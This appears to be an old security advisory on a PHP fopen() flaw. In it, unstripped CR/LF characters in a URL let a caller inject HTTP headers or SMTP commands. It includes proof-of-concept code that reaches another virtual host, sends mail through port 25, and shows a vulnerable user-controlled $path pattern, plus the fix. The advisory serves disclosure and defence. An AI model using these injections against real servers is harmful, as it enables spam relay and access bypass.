As you know, you can use URL's in fopen(), file() etc when allow_url_fopen is On. Unfortunately, PHP doesn't remove spaces, tabs, CR or LF characters from the URL before constructing an HTTP query. This means that we can add arbitrary HTTP headers to the URL, like this:

<?php

$fp = fopen("http://www.site1.st/ HTTP/1.0\n".
            "Host: www.site2.st\n".
            "User-Agent: Nozilla/0.0\n".
            "Referer: http://www.metaur.nu/\n".
            "Cookie: user=ulf\n\n", "r");
fpassthru($fp);

?>

This program will display the contents of site2.st instead of site1.st, if they live on the same virtual host.

You can also use it for communication with other types of servers than HTTP servers:

<?php

$fp = fopen("http://mail.site1.st:25/ HTTP/1.0\n".
            "HELO my.own.machine\n".
            "MAIL FROM: <user@my.own.machine>\n".
            "RCPT TO: <info@site1.st>\n".
            "DATA\n".
            "From: user@my.own.machine\n".
            "To: info@site1.st\n".
            "Subject: This is..\n\n".
            "This is a URL that sends an e-mail (?).\n".
            ".\n".
            "QUIT\n\n", "r");
fpassthru($fp);

?>

Both the mail server and PHP will complain, but the mail still gets sent.

This can even lead to a security hole in a program like this:

<?php

$fp = fopen("http://www.site3.st/$path", "r");
fpassthru($fp);

?>

because it allows the user to break out of restrictions and access some other site than site3.st.

I have verified this behaviour in PHP 4.1.2, 4.2.2 and a CVS checkout from a few days ago. You fix it by removing all spaces, tabs, CR characters and LF characters from the URL's.

// Ulf Harnhammar
ulfh@update.uu.se